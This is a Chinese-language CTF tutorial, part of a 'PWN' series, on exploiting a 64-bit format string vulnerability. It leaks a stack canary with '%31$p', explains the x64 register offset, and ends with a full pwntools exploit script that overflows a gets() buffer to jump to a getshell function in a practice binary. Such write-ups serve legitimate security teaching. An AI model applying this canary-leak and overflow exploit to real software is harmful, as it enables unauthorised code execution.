PWN从入门到放弃(9)——格式化字符串漏洞(x64)
上篇我们介绍了一下格式化字符串漏洞的原理,并讲解了32位elf程序的格式化字符串漏洞的利用。
这篇我们来讲解一下64位格式化字符串漏洞该如何利用
0x00 题目分析
1)查看文件信息
按照国际惯例,先查看文件信息
$ file format_canary2
$ checksec format_canary2
64位elf程序,开启了canary保护
2)查看程序流程
运行程序,查看大概流程
程序提供两次输入两次输出
3)分析程序&查找漏洞点
首先查看main()函数
gets函数很明显存在栈溢出,printf函数存在格式化字符串漏洞
继续看getshell函数
getshell函数会给我们返回个shell
那么这道题的思路就很清晰了,我们利用格式化字符串漏洞泄露出canary的值,然后再利用栈溢出,控制程序返回到getshell函数即可。
0x01 编写脚本
64位和32位的格式化字符串漏洞原理是一样的,只不过有一些小小的不同
我们先用GDB来调试程序,并在printf函数下断点
$ gdb ./format_canary2
gdb-peda$ b * printf
我们先反汇编一下main()函数
我们看到,canary的值在rbp-0x8的位置
我们随便输入一些东西,查看$rbp-0x8的值,然后查看栈空间
我们能够在栈空间找到canary的值
我们从头查一下,第26位是canary的值,但是这里要注意,64位和32位不同,众所周知64的程序传参是前六个存在六个寄存器中,从第七个开始入栈,所以在利用格式化字符串漏洞时会有六个偏移。
因此我们需要将26+6-1,也就是偏移31
我们重新调试程序,输入%31$p,这里不要输入$
x
这里我们已经可以成功泄露canary的值了,我们接着调试程序
还是在printf函数处下断点,这里断在第二个printf函数
输入字符,然后查看栈空间
从我们输入到canary一共是25*8个字节
从canary到返回地址是1*8个字节
那么我们就可以构造exp了
附上完整EXP
from pwn import *
r = process('./format_canary2')
leak = '%31$p'
r.sendline(leak)
canary = r.recv(18)[2:]
print 'Canary >>>>>> ' + canary
canary_valu = int(canary,16)
getshell = 0x00400805
payload = 'a' * 25 * 8
payload += p64(canary_valu)
payload += 'a' * 1 * 8
payload += p64(getshell)
r.sendline(payload)
r.interactive()